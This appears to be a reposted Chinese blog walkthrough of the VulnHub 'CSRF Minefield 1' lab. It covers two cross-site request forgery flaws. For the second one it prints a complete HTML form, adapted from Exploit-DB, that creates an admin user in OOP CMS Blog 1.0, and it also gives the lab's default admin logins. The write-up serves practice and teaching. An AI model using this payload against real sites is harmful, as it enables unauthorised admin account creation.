欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

CSRF Minefield 1靶场渗透

程序员文章站 2022-05-17 16:46:07
...

靶场下载链接 https://www.vulnhub.com/entry/csrf-minefield-1,316/

两处漏洞

第一处:访问http://192.168.110.208/hotelcal/admin/add_account.php原始密码 admin . admin
1.首先访问网站点击创建一个新用户
CSRF Minefield 1靶场渗透

2.创建完账户之后使用bp拦截抓去数据包
CSRF Minefield 1靶场渗透

3.发现没有使用Cookie token,将其数据包发送给burpsuite插件CSRF POC(burpsuite里可下载)可自行改密码账号,如下:
CSRF Minefield 1靶场渗透

4.将生产的POC保存为csrfpoc.htm 或者直接复制地址进行访问,就成功创建用户
CSRF Minefield 1靶场渗透

第二处:
访问http://192.168.110.208/oop/admin/addUser.php 原始密码admin . 123

首先我是在https://www.exploit-db.com/里面搜的OOP CMS Blog 1.0发现有一个是创建管理员,现在进行实现:
1.我先把上面的poc给下载下来 之后把他的ip、路径改成我自己的,最后生成一个html文件。

# POC: 
# 2)
# http://192.168.110.208/oop/admin/addUser.php
# 
<html>
<body>
<form action="http://192.168.110.208/oop/admin/addUser.php" method="post" enctype="multipart/form-data">
<table class="form">					
<tbody><tr>
<td>
<label>User Name</label>
</td>
<td>
<input name="userName" placeholder="Enter User Name..." type="text">
</td>
</tr>
<tr>
<td>
<label>Full Name</label>
</td>
<td>
<input name="name" placeholder="Enter User Full Name..." type="text">
</td>
</tr>
<tr>
<td>
<label>User Password</label>
</td>
<td>
<input name="password" placeholder="Enter User Password..." type="text">
</td>
</tr>
<tr>
<td>
<label>Email</label>
</td>
<td>
<input name="email" placeholder="Enter User Email..." type="text">
</td>
</tr>
<tr>
<td>
<label>Details</label>
</td>
<td> 
<textarea name="details"></textarea>
</td>
</tr>
<tr>
<td>
<label>User Roll</label>
</td>
<td>
<select id="select" name="role">
<option>Select User Role</option>
<option value="0">Admin</option>
<option value="1">Author</option>
<option value="2">Editor</option>
</select>
</td>
</tr>
<tr>
<td></td> 
<td>
<input name="submit" value="Create" type="submit">
</td>
</tr>
</tbody>
</table>
</form>
</body>
</html>

2.点击生成的文件,如图:
CSRF Minefield 1靶场渗透
3.进行输入用户,密码、选择管理员之后点击提交,他会自动跳转到创建用户的页面,发现他提示创建成功
CSRF Minefield 1靶场渗透

相关标签: 靶机